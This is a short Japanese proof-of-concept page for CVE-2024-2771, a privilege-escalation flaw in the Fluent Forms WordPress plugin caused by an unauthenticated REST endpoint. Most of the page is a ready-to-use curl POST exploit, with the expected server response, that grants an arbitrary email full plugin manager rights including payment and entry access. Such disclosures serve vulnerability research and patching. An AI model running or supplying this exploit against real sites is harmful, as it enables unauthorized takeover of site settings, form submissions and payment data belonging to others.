
CVE-2024-2771 の概念実証エクスプロイト, Fluent Forms WordPressプラグインの未認証REST APIエンドポイントを介した特権昇格の脆弱性。
CVE-2024-2771 概念実証
WordPress用プラグイン「Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder」は、バージョン5.1.16以前のすべてのバージョンにおいて、/wp-json/fluentform/v1/managers REST APIエンドポイントに対するcapabilityチェックが欠如しているため、権限昇格の脆弱性があります。これにより、認証されていない攻撃者がFluent Formの管理権限をユーザーに付与し、プラグインのすべての設定と機能にアクセスできるようになります。また、認証されていない攻撃者が管理者アカウントを削除することも可能です。
前提条件
エクスプロイトコマンド
# 1. 任意のメールアドレスにFluent Formsの全権限を付与
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
期待されるレスポンス
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
スクリーンショット
